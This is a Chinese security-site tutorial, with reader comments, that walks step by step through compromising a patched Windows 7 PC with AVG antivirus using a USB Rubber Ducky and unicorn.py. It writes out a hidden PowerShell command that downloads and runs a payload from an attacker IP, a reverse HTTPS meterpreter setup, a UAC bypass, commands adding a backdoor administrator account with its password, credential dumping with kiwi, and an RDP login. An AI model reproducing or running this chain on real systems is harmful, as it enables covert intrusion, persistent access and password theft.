橡皮鸭

橡皮鸭
FB招聘站
分类阅读
专栏
公开课
FIT 2019
企业服务
用户服务
搜索
投稿
登录
注册
使用橡皮鸭硬件绕过杀软，渗透Win 7 Sphinx专栏作者2016-05-30金币奖励+9共468758人围观，发现 15 个不明物体系统安全
本文将演示如何使用USB Rubber Ducky和unicorn攻击一台运行AVG2015杀毒软件并且补丁全部打上的Windows 7电脑。本教程仅供学习，请勿用作非法用途。

duck_thumb_fa2571a3-a36f-460a-b68b-d29d74d87b2f_1024x1024.jpg

准备
进行实验所要做的准备：

Windows 7 (受害者主机)

Kali Linux 2.0 (攻击者主机)

USB Rubber Ducky 硬件

注意：Windows 7 和 Kali系统可以是虚拟运行的也可以是实体运行的，但是我们建议在专门的实体硬件上运行Windows7以防止USBRubber Ducky模拟键盘HID的时候虚拟化技术将动态更改USB分配。

获得payload
1. 从Hakshop 购买USB Rubber Ducky Deluxe

BLOG-WIN7-screenshot.png

2. 访问 USB Rubber Ducky的Wiki 使用其中的模板payload

2.png

3. 复制 “Payload – Powershell Wget + Execute” GUI r DELAY 100STRING powershell -windowstyle hidden (new-objectSystem.Net.WebClient).DownloadFile(‘http://example.com/bob.old’,’%TEMP%\bob.exe’);Start-Process “%TEMP%\bob.exe”

3.png

4. 将默认的URL“http://example.com”改成你自己的域名或IP地址。我的设定是：GUIr DELAY 100 STRING powershell -windowstyle hidden (new-objectSystem.Net.WebClient).DownloadFile(‘http://192.168.1.115/win/anything.txt’,’%TEMP%\drop.cmd’);Start-Process “%TEMP%\drop.cmd” ，然后按回车

5. 把你修改过的代码粘贴到在线DuckToolkit编码器中，选择键盘样式，然后点击生成脚本。

5.png

6. 下载“inject.bin” 和 “inject.txt” 文件。把“inject.bin” 复制到Rubber Ducky中的SD卡中，“inject.txt” 供参考之用

6.png

7.把micro SD卡插入micro SD USB适配器（不是RubbyDucky），然后插入Kali电脑。

8.将“inject.bin”文件从你的下载文件夹复制到Micro SD卡根目录

8.png

9.接下来我们用unicorn生成payload。从GitHub下载unicorn.py。Unicorn是一款使用PowerShell降级攻击的简单工具，它会把shellcode直接注入到内存中。这个项目给予MatthewGraeber的Powershell攻击和DavidKennedy (TrustedSec) 和Josh Kelly在Defcon 18上展示的powershell绕过技巧。

9.png

10.在浏览器菜单点击“文件”-“保存为”选项，将页面保存到你的文件系统，我把它放在了桌面上的一个叫USB_RD的文件夹里。

10.png

11.用“unicorn.py”生成反向https meterpreter payload。待会你要运行pythonunicorn.py windows/meterpreter/reverse_https 192.168.1.115 8443，记得修改里面的IP地址和端口。

11.png

12. 这时两个文件都生成完毕， “powershell_attack.txt” 和“unicorn.rc”。将powershell_attack.txt 命名为第四步中你打算放在服务器上的文件名。我的是“anything.txt”。

注意：“unicorn.rc”文件可以被用在metasploit会话中以建立监听器。

12.png

13.复制payload文件“anything.txt”到你的web服务器上。我的文件在web根目录下（步骤4中制定的）

13.png

14.开启apache2 web服务器，然后用tail查看日志文件，这样就能看到来自Windows7的请求。

注意：tail的“-f” 参数能够保证文件实时更新

14.png

15. 现在我们启动meterpreter 监听器。打开新的终端窗口，进入unicorn.rc 文件所在的目录，然后启动metasploit： msfconsole -runicorn.rc

15.png

16.将micro SD卡从攻击主机(Kali)中拔出，然后插入到USBRubber Ducky中。

打上全部补丁的Windows 7 + AVG 2015

BLOG-WIN7-w7andavupdated.png

Windows 7 网络信息

BLOG-WIN7-w7ipinfo.png

插入橡皮鸭
17. 在Windows 7中插入USB Rubber Ducky ，稍等片刻等待主机识别设备并执行代码。注意查看web服务器日志，这是你唯一能用来判断是否正常工作的东西。

重要事项：如果你在虚拟机内实验，在插入USB Rubber Ducky之前你得确保Windows7主机处于活跃状态，以防你把橡皮鸭插到别的主机上。

17.png

18. 如果Rubber Ducky正常运行了，你马上会看到它在下载你服务器上的文件，然后你还应该看到有个meterpreter会话打开了

181.png

182.png

19. 接着我们到meterpreter 会话中看看我们能干什么。你可以运行sysinfo 、ipconfig查看主机信息。sessions -i 1

191.png

UAC绕过
20.由于UAC的关系，目前为止，我们还没有系统权限

20.png

21. 我们看看能不能用别的模块绕过UAC，经过几番实验后，我们发现bypassuac_vbs可以用来绕过。

21.png

22. 设置exploit，然后设置其他payload返回你一个有权限的shell。这次我们使用标准的反向tcp因为创建其他reverse_https通道好像有问题。

22.png

23. 执行这个exploit，然后等待建立第二个没有UAC限制的会话

23.png

24. 我们看看能不能获取权限

24.png

25. 成了！接下来我们创建一个管理员帐号 (haxtorDaMan) 把它提升到管理员组，并且成为远程桌面用户。

net user haxtorDaManhax@Pass50 /add net localgroup “Administrators” haxtorDaMan /add net localgroup“Remote Desktop Users” haxtorDaMan /

25.png

26. 我们现在可以到Windows7机器上看看用户有没有创建成功

26.png

27. 接下来我们看看能否用kiwi获取明文密码：load kiwi meterpreter> creds_all

27.png

远程连接
28. 接着我们尝试用RDP连接到Windows 7，首先在msfconsole运行enable_rdp模块。把SESSION设置为无UAC限制的有权限的session，我的是SESSION2

28.png

29. 然后用haxtorDaMan账号登录：xfreerdp /v:192.168.1.108 /port:3389/size:1600×900/u:haxtorDaMan /p:hax@Pass50

29.png

30.png

Note: 我实验的时候rdesktop 不支持Windows加密会话，所以用了xfreerdp。

相关阅读：
BadUSB的前世今生：USB RUBBER DUCKY和Teensy USB

*参考来源：InformationSecurity，FB小编Sphinx编译，文章有修改，转载请注明来自Freebuf黑客与极客（FreeBuf.COM）

Sphinx
Sphinx
412 篇文章
等级： 9级
||
上一篇：剪贴板劫持：复制粘贴中暗藏杀机下一篇：rop-tool：一款辅助撰写二进制exp的工具
这些评论亮了

Black-Hole (6级)FreeBuf专栏作者回复
以下是hack5回复的邮件内容：

The HakShop has a strict shipping policy. The countries omitted from our processing and shipping list are due to one or several of these specific reasons:
-The country's laws prohibit the import of Wifi Routers or electronics sold from our store.
-More than 50% of packages sent are lost, destroyed or abandoned.
-Packages have been returned and marked unable to import from US mail box centers
-There is an Embargo, an official ban on trade or other commercial activity with a particular country.
I apologize for the inconvenience. Our shipping software and credit card processor will only support the countries on our shipping and fulfillment list.
Orders may be placed from and shipped to the following nations:
Australia, Austria, Belgium, Canada, Denmark, Finland, France, Germany, Greece, Greenland, Hungary, Iceland, Ireland, Italy, Lithuania, Luxembourg, Mexico, Monaco, Netherlands, New Zealand, Norway, Poland, Portugal, Romania, Slovakia, Slovenia, Spain, Sweden, Switzerland, Turkey, United Kingdom, United States.
Here is a link to our policy page for further information:
hakshop.com/policy
大体就是说：“我们不运给中国，支持的运送国家里没有中国”
)13(亮了

小道儿回复
谁能破费买一个，把原理图拔出来。官方提供Firmware, Encoders and Toolkits，直接山寨掉，价格也就200一个。
)7(亮了
发表评论已有 15 条评论

XXXX 2016-05-30回复 1楼
。。。。。嗯，确实绕过了杀软和全补丁，哈哈

亮了(3)

liuchaoth (2级) 2016-05-30回复 2楼
usb设备枚举阶段出的问题？

亮了(3)

liuchaoth (2级) 2016-05-30回复 3楼
又看了一下，好像是模拟键盘输入的

亮了(5)

Black-Hole 认证作者专栏作者(6级) FreeBuf专栏作者 2016-05-30回复 4楼
以下是hack5回复的邮件内容：

The HakShop has a strict shipping policy. The countries omitted from our processing and shipping list are due to one or several of these specific reasons:

-The country’s laws prohibit the import of Wifi Routers or electronics sold from our store.

-More than 50% of packages sent are lost, destroyed or abandoned.

-Packages have been returned and marked unable to import from US mail box centers

-There is an Embargo, an official ban on trade or other commercial activity with a particular country.

I apologize for the inconvenience. Our shipping software and credit card processor will only support the countries on our shipping and fulfillment list.

Orders may be placed from and shipped to the following nations:

Australia, Austria, Belgium, Canada, Denmark, Finland, France, Germany, Greece, Greenland, Hungary, Iceland, Ireland, Italy, Lithuania, Luxembourg, Mexico, Monaco, Netherlands, New Zealand, Norway, Poland, Portugal, Romania, Slovakia, Slovenia, Spain, Sweden, Switzerland, Turkey, United Kingdom, United States.

Here is a link to our policy page for further information:

hakshop.com/policy

大体就是说：“我们不运给中国，支持的运送国家里没有中国”

亮了(13)

ttzer0 2016-05-30回复 5楼
越玩越高级了

亮了(2)

死宅10086 (7级) 2016-05-30回复 6楼
高级高级高级高级 :grin:

亮了(3)

追梦人456 (3级) 努力去做自己该做的事情 2016-05-30回复 7楼
绕过了杀毒软件和补丁会怎样的呢？

亮了(3)

cwg2552298 (6级) Follow my own course 2016-05-30回复 8楼
:???: 买不起这鸭子……

亮了(3)

global_hacker (4级) 2016-05-30回复 9楼
关键还是模拟环境实际中还是困难重重的

亮了(3)

JuncoJet 2016-05-31回复 10楼
好奇橡皮鸭不就是按键模拟器么？

亮了(4)

zeroFile 2016-05-31回复 11楼
绕过UAC提权是亮点学习了

亮了(4)

h2z (2级) 2016-05-31回复 12楼
谢谢分享谢谢分享

亮了(3)

JAZ123321 (3级) 2016-06-06回复 13楼
windows7 所有版本?

亮了(3)

小道儿 2016-06-06回复 14楼
谁能破费买一个，把原理图拔出来。官方提供Firmware, Encoders and Toolkits，直接山寨掉，价格也就200一个。

亮了(7)

My praver (1级) 2016-07-05回复 15楼
有哪个大神教教我怎么不借助外界工具修改电脑的开机密码

亮了(3)
昵称
请输入昵称
必须您当前尚未登录。登陆？注册邮箱
请输入邮箱地址
必须（保密）表情插图
有人回复时邮件通知我
Sphinx
Sphinx专栏作者

这家伙太懒了，什么都没写

412
文章数
89
评论数
最近文章
BUF 早餐铺 | Facebook再曝数据丑闻：1.2亿用户数据面临泄露风险；自2012年以来，所有Android设备都受到RAMpage漏洞的影响；Gentoo GitHub镜像被黑客攻击
2018.07.02

BUF 早餐铺 | WebAssembly的修改会使得Meltdown和Spectre补丁失效；英国税务局记录了510万英国人的声音；苹果回应iPhone密码被暴力破解：测试是错误的
2018.06.26

快讯 | 黑龙江高考查分官网瘫痪，查询入口被微信封锁
2018.06.25

浏览更多
相关阅读
BadUSB橡皮鸭综合利用，使用橡皮鸭渗透电脑测试小技巧：如何发现是否有人用USB偷插你的电脑？研究人员演示：用USB设备能够秘密窃取临近USB接口的数据如何检测用USB创建并进行类似Stuxnet传播的隐蔽网络利用Arduino快速制作Teensy BadUSB
特别推荐

关注我们分享每日精选文章

活动预告
11月

FreeBuf精品公开课·双11学习狂欢节 | 给努力的你打打气
已结束
10月

【16课时-连载中】挖掘CVE不是梦（系列课程2）
已结束
10月

【首节课仅需1元】挖掘CVE不是梦
已结束
9月

文章评论